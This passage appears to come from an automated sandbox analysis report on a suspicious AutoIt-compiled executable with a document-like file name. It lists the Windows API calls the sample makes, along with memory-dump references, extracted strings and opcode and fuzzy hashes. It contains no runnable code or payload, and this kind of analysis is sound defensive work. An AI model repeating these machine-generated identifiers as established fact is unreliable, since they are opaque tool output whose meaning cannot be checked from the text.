                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00818B73
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00818B89
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00818BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ee93f96179a7339646fb8ea82df25039172cd007bd6e8668179f9d98d552fdc2
                                                        • Instruction ID: 518ad5cda79f3355e13307af8eaa53534a03649af2c2ab8368d3b0ffbb05040e
                                                        • Opcode Fuzzy Hash: ee93f96179a7339646fb8ea82df25039172cd007bd6e8668179f9d98d552fdc2
                                                        • Instruction Fuzzy Hash: ED110679901218FFEB11DBA5C885EADBBB8FF48710F2040A5EA04B7290DA716E51DB94
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 007C12D8
                                                        • GetClientRect.USER32(?,?), ref: 007FB5FB
                                                        • GetCursorPos.USER32(?), ref: 007FB605
                                                        • ScreenToClient.USER32(?,?), ref: 007FB610
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 9890985110b248aa707bea1304d68aab700b0aac595ef255caaed57b3d1dbadd
                                                        • Instruction ID: 79ae6947eee0eb1d08689a5ab891ae9c7cec784a70d22ce11fbc0a2af7c7f814
                                                        • Opcode Fuzzy Hash: 9890985110b248aa707bea1304d68aab700b0aac595ef255caaed57b3d1dbadd
                                                        • Instruction Fuzzy Hash: F111FE39600019EBDB10EF98D889EBE77B8FB06301F50446DFA11E7152D734BA51CBA5
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 0082115F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 00821184
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 0082118E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 008211C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 018666aafec640beebcefb1f5314c96a4d6defb4ff73d7c9a6f8a4ad3c28a5e8
                                                        • Instruction ID: dfed87c0b5fe89596a98162dc7ffdaa22c00b7ba15f3fa259fc52342ccac71e7
                                                        • Opcode Fuzzy Hash: 018666aafec640beebcefb1f5314c96a4d6defb4ff73d7c9a6f8a4ad3c28a5e8
                                                        • Instruction Fuzzy Hash: D9113C35D0052DE7CF009FA5E848AEEBBB8FF29711F114059EA45F2241CB7095A0CB96
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0081D84D
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0081D864
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0081D879
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0081D897
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 7c8188028f5e40803d0fa955ddb98dc2d430faf730fd90d8eae83bf1c61d0723
                                                        • Instruction ID: eb904256c1da62f020b1432737bec38f65f188cae2e7b75c814c0de440bbe20b
                                                        • Opcode Fuzzy Hash: 7c8188028f5e40803d0fa955ddb98dc2d430faf730fd90d8eae83bf1c61d0723
                                                        • Instruction Fuzzy Hash: 51113C75605309DBE3208F50DC08FD2BBACFF00B14F10897DAA16D6051D7B0E689DBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: 735967d579bee21630d392224d2904460b6bace23d80d77b5be34bf3fa86929f
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: A4014B7244814EBBCF1A5E84DC05CEE3F62BF28355B588415FB1899231D63AC9B1EB81
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0084B2E4
                                                        • ScreenToClient.USER32(?,?), ref: 0084B2FC
                                                        • ScreenToClient.USER32(?,?), ref: 0084B320
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0084B33B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: 0307c42912ebd50c2516383c7d745a923b71082da08d13c0c7d4dd29afd1fdde
                                                        • Instruction ID: aae22d358cc6815fc7c6778455eb35de810586b0e6f09d18f4154c66db61848c
                                                        • Opcode Fuzzy Hash: 0307c42912ebd50c2516383c7d745a923b71082da08d13c0c7d4dd29afd1fdde
                                                        • Instruction Fuzzy Hash: F41143B9D00209EFDB41CFA9D8849EEBBF9FB19310F108166E914E3220D735AA65CF50
                                                        APIs
                                                        • _memset.LIBCMT ref: 0084B644
                                                        • _memset.LIBCMT ref: 0084B653
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00886F20,00886F64), ref: 0084B682
                                                        • CloseHandle.KERNEL32 ref: 0084B694
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: 015f573a7a457ea6f2d5150451cc3e83abdf53f557c01972817b48e7cb3b0298
                                                        • Instruction ID: 64a582779679d7a878d78917004d5bd80d016d188478b49ccdc81a9304817755
                                                        • Opcode Fuzzy Hash: 015f573a7a457ea6f2d5150451cc3e83abdf53f557c01972817b48e7cb3b0298
                                                        • Instruction Fuzzy Hash: E0F0F4B1640304BAE2106B657C09F7B7A9CFB09755F005025BB08E5192EB759C21C7A8
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00826BE6
                                                          • Part of subcall function 008276C4: _memset.LIBCMT ref: 008276F9
                                                        • _memmove.LIBCMT ref: 00826C09
                                                        • _memset.LIBCMT ref: 00826C16
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00826C26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: 7aed2e60c55b2d598153b5cf7590c8760a26b56d8f52fcd1d814e4712c51ebfa
                                                        • Instruction ID: 8004c66c11dd70318c2f7387bd0cf7ef4ecf0f2abee8ec2d332b4dfaa8d64c18
                                                        • Opcode Fuzzy Hash: 7aed2e60c55b2d598153b5cf7590c8760a26b56d8f52fcd1d814e4712c51ebfa
                                                        • Instruction Fuzzy Hash: 04F0543A201110BBCF016F55EC89A4ABB29FF49321F048065FE089E227C775E851CBB5
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 007C2231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 007C223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 007C2250
                                                        • GetStockObject.GDI32(00000005), ref: 007C2258
                                                        • GetWindowDC.USER32(?,00000000), ref: 007FBE83
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007FBE90
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 007FBEA9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 007FBEC2
                                                        • GetPixel.GDI32(00000000,?,?), ref: 007FBEE2
                                                        • ReleaseDC.USER32(?,00000000), ref: 007FBEED
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 490557382251be743504c5446020f2cfc90b39829ab5b5b67357fa188e1f207f
                                                        • Instruction ID: c469214ecbe2ca375a187422f216fc6d9d7ea4bf9d1a59e3b12a868017e102f7
                                                        • Opcode Fuzzy Hash: 490557382251be743504c5446020f2cfc90b39829ab5b5b67357fa188e1f207f
                                                        • Instruction Fuzzy Hash: B2E03936104244EAEB225F64EC0DBE83B10FB06332F01836AFB69980E287B14980DB12
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0081871B
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,008182E6), ref: 00818722
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008182E6), ref: 0081872F
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,008182E6), ref: 00818736
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: b99ca69c88b84a930254a3ac9314dd70ac6031e096b63b09312b10a40db68cdb
                                                        • Instruction ID: 483a8eab5a525d947b0e63cf0687d7afc653846a391ef62ff88bb0936e887a3e
                                                        • Opcode Fuzzy Hash: b99ca69c88b84a930254a3ac9314dd70ac6031e096b63b09312b10a40db68cdb
                                                        • Instruction Fuzzy Hash: 15E04F3A6112119BD7205FF15D0DB967BACFF52792F14482CA345C9081DA248481C750
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0081B4BE
                                                        Strings
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: 4beaf2265144891e3028139096f3392aa8958cb5505dd99dee332afd57cc7b55
                                                        • Instruction ID: eff665c653a1300e26d6dbd867033d4b470f300eb4eb2d0747c2c7b1c0c32567
                                                        • Opcode Fuzzy Hash: 4beaf2265144891e3028139096f3392aa8958cb5505dd99dee332afd57cc7b55
                                                        • Instruction Fuzzy Hash: D0913970600605AFDB14DF69C884AAAB7F9FF49710F20856DF94ACB391DB71E885CB50
                                                        APIs
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • __wcsnicmp.LIBCMT ref: 0082B02D
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0082B0F6
                                                        Strings
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: cea7ae9e83d3350223f1d459506ba32f4636b1e782c082659f6ee6ade6787605
                                                        • Instruction ID: 6ea387af68a1e272de9912c613b9113c0039cac12741d03169e726c1dfc29818
                                                        • Opcode Fuzzy Hash: cea7ae9e83d3350223f1d459506ba32f4636b1e782c082659f6ee6ade6787605
                                                        • Instruction Fuzzy Hash: 31616D75A01229EFCB15DF94D895EAEB7B4FF08710F10406AF916EB291DB74AE80CB50
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 007D2968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 007D2981
                                                        Strings
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: ea2075f30fad4d57a3051085caf3a7453b4f595682a6c61f3f36270e05a3322e
                                                        • Instruction ID: bebb10210f9e6803b1e2f4ebb103a28a05a4fe51be50f9884c10227753e3142a
                                                        • Opcode Fuzzy Hash: ea2075f30fad4d57a3051085caf3a7453b4f595682a6c61f3f36270e05a3322e
                                                        • Instruction Fuzzy Hash: 9D514672408744DBD360EF10D88ABAFBBE8FF85344F42885DF2D9421A1DB748569CB66
                                                        APIs
                                                          • Part of subcall function 007C4F0B: __fread_nolock.LIBCMT ref: 007C4F29
                                                        • _wcscmp.LIBCMT ref: 00829824
                                                        • _wcscmp.LIBCMT ref: 00829837
                                                        Strings
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: 22c1330b225c3c0ac9805a8b34b033b09faec20e58c59add297195003f762727
                                                        • Instruction ID: 2600d4bdf8ca0ccf1c6b03f3225fa7af4f214a5b65e2658c65ec35c4ff04a352
                                                        • Opcode Fuzzy Hash: 22c1330b225c3c0ac9805a8b34b033b09faec20e58c59add297195003f762727
                                                        • Instruction Fuzzy Hash: 5841D571A00219BADF209AA5DC49FEFBBFDEF85710F04007DF904E7280DA759A448B61
                                                        APIs
                                                        • _memset.LIBCMT ref: 0083259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008325D4
                                                        Strings
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: 812f8d82df0b37abdccc38f1e07fd69f45b17e674b615661f4400a42cc371ef2
                                                        • Instruction ID: 999228a599271891612d90c5d7fadc181de506b6ec42a72527b0c3348f6db848
                                                        • Opcode Fuzzy Hash: 812f8d82df0b37abdccc38f1e07fd69f45b17e674b615661f4400a42cc371ef2
                                                        • Instruction Fuzzy Hash: EE31F671801119EBCF05EFA5CC8AEEEBFB8FF18310F100069E915A6162EA355956DFA0
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00846B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00846B53
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 4b3e2e797dab8ddc98d1bebcf7d76f803ea26cbdfe5e1b4c64a859b5f072844c
                                                        • Instruction ID: 39e1959c386968caa800d59d7631364533aa566273a90b84c19585717940ee15
                                                        • Opcode Fuzzy Hash: 4b3e2e797dab8ddc98d1bebcf7d76f803ea26cbdfe5e1b4c64a859b5f072844c
                                                        • Instruction Fuzzy Hash: 3C318D71200608AEDB109F68CC80BFB77A9FF49764F10861DF9A5D7190EA34AC91C761
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0082294C
                                                        Strings
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: afbbfe3593f4d860825a364a8c43a6a9eb981871fbb3dbdf35f6b93df68ceb4b
                                                        • Instruction ID: 073a9722e7a590ad32f3849bb830e5bafde9126d936cb52c239b89ae5b8fef3e
                                                        • Opcode Fuzzy Hash: afbbfe3593f4d860825a364a8c43a6a9eb981871fbb3dbdf35f6b93df68ceb4b
                                                        • Instruction Fuzzy Hash: 0C31BF31A00329BBEB28CE58E885FAEBFA8FF45350F140069E985E61A1D77099C4CB51
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00833A66
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        Strings
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        • Opcode ID: 2b6d578a0c7286b63eda8cf729ab0234e2356f3678e0d9c5394db4d571223d56
                                                        • Instruction ID: bbfccc389e6a51466012f2a8ce25bcbd329b1e4bda4085f54da1ac893e81674a
                                                        • Opcode Fuzzy Hash: 2b6d578a0c7286b63eda8cf729ab0234e2356f3678e0d9c5394db4d571223d56
                                                        • Instruction Fuzzy Hash: C4215E31600219EACF14EF64CC8AEAE77A9FF94710F504458E559EB281DA38EA45CBA1
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • GetParent.USER32(?), ref: 007FB7BA
                                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,007C19B3,?,?,?,00000006,?), ref: 007FB834
                                                        Strings
                                                        Similarity
                                                        • API ID: LongWindow$ParentProc
                                                        • String ID: 0R
                                                        • API String ID: 2181805148-1916035689
                                                        • Opcode ID: cd0472c631ad67a3dce0e750965e78eb9e6f19bf533e488598bd08823efaae58
                                                        • Instruction ID: 992270b5ed771104a23704873b27047244b9ad65e33e77ef5572d80a70deb2bb
                                                        • Opcode Fuzzy Hash: cd0472c631ad67a3dce0e750965e78eb9e6f19bf533e488598bd08823efaae58
                                                        • Instruction Fuzzy Hash: 11219638601508AFCB109F28C988EB93B96EF4A320F98426DF6255B3F3C7355D51DB50
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00846761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0084676C
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 246dc32d6ce8b15c378a70456290cb3487d7fb76549b87d89c92e7ccdcd99087
                                                        • Instruction ID: bf4faa8c452eea6ccd7b6a868fd0b06106da12f31ba5910a6bcbfde93fc4451b
                                                        • Opcode Fuzzy Hash: 246dc32d6ce8b15c378a70456290cb3487d7fb76549b87d89c92e7ccdcd99087
                                                        • Instruction Fuzzy Hash: 8B11907520020CAFEF119F54CC80EBB376AFB4A3A8F114229F918D7291E635DC6187A1
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0R
                                                        • API String ID: 0-1916035689
                                                        • Opcode ID: 3ac293f9e16ae60bbb6fffa5e3cf0d96756e53de4d2d5ddf1cfdea6694fc5d71
                                                        • Instruction ID: 13d9240546cda840bf880364a7a46da02013f85633e9035bcbacf1792e9ba8ef
                                                        • Opcode Fuzzy Hash: 3ac293f9e16ae60bbb6fffa5e3cf0d96756e53de4d2d5ddf1cfdea6694fc5d71
                                                        • Instruction Fuzzy Hash: 6D217F3512420CBFEB209F58CC45FBB37A4FB09324F404169FA96DA1E1D671EA10DB60
                                                        APIs
                                                          • Part of subcall function 007C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007C1D73
                                                          • Part of subcall function 007C1D35: GetStockObject.GDI32(00000011), ref: 007C1D87
                                                          • Part of subcall function 007C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007C1D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00846C71
                                                        • GetSysColor.USER32(00000012), ref: 00846C8B
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: f36c793271f7886e090cef456a526b3df7d95e6f14f8014f7fb07ea09627d117
                                                        • Instruction ID: a4926281e5dafb76ad314bd340d767bc05dc9df856a9c6a3929a5b2d86d456df
                                                        • Opcode Fuzzy Hash: f36c793271f7886e090cef456a526b3df7d95e6f14f8014f7fb07ea09627d117
                                                        • Instruction Fuzzy Hash: B7212676610209AFDF04DFA8CC85EFA7BB8FB09314F014629FE95D2251E635E860DB61
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: CreateMenuPopup
                                                        • String ID: 0R
                                                        • API String ID: 3826294624-1916035689
                                                        • Opcode ID: 245604883e9c66b49d6a68df0e631ba405e7d44e896de1aa2b6dbfb8769ce1fb
                                                        • Instruction ID: 3e7f3a25f82bdf023de8ddcc303b208f82b8bc94a60a557de9df62533b4b1dcb
                                                        • Opcode Fuzzy Hash: 245604883e9c66b49d6a68df0e631ba405e7d44e896de1aa2b6dbfb8769ce1fb
                                                        • Instruction Fuzzy Hash: C8215C7850060DDFCB20CF28C444B96BBE1FB0A324F44866AE859DB391E731AC66CF52
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 008469A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008469B1
                                                        Strings
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: d5e70914cdcf25f1de7f0eaee4c7c8494f81c230ec231bf71718941ffe70ade4
                                                        • Instruction ID: 518b67513b22d2cd96496097cd0c39c6ce9cd002025917b39ec65959be35a04c
                                                        • Opcode Fuzzy Hash: d5e70914cdcf25f1de7f0eaee4c7c8494f81c230ec231bf71718941ffe70ade4
                                                        • Instruction Fuzzy Hash: 3F116D7111020DABEB108E749C44AAB3FA9FB06378F504728F9A5D61E0D6B5DCA19761
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00822A41
                                                        Strings
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: e60a0ad63a5f7152d625dadde72531cc3d5811199a12edd5d0196404d8381887
                                                        • Instruction ID: 2df1ae3dba3db617e89e16a129eed6f90137979fa6291ea91cfb3bf0f998a71d
                                                        • Opcode Fuzzy Hash: e60a0ad63a5f7152d625dadde72531cc3d5811199a12edd5d0196404d8381887
                                                        • Instruction Fuzzy Hash: 0811E232D01138BBCB34DB9CEC44BAA77B9FB45314F044021E956EB290D770AE8AC791
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0083222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00832255
                                                        Strings
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 2af7eac15e2e4ae0719b7cd483c5a316375c1e56b90a147daf0669c5062ab342
                                                        • Instruction ID: cf22b60f7b49fea599833c1289cbc7cce59dc883588343bc247722c6ae06d7b9
                                                        • Opcode Fuzzy Hash: 2af7eac15e2e4ae0719b7cd483c5a316375c1e56b90a147daf0669c5062ab342
                                                        • Instruction Fuzzy Hash: 6811CE70541229BADB258F518C88EBBFBA8FF96765F10822AFA15C6100D3706990D6F0
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?), ref: 00848530
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: 0R
                                                        • API String ID: 3850602802-1916035689
                                                        • Opcode ID: 40d20385b2082a80644ef0567dff86b8cee90b47857b675075d4ce2d487fa11f
                                                        • Instruction ID: 8238922a97769ed3756d68e632c9d1135fde56520b2d4070aca856a84b69ad46
                                                        • Opcode Fuzzy Hash: 40d20385b2082a80644ef0567dff86b8cee90b47857b675075d4ce2d487fa11f
                                                        • Instruction Fuzzy Hash: 6221B379A0020DEFCB15DF98D8408AE7BB5FB4D354B014159FE06E7360DA31AD61DBA0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0R
                                                        • API String ID: 0-1916035689
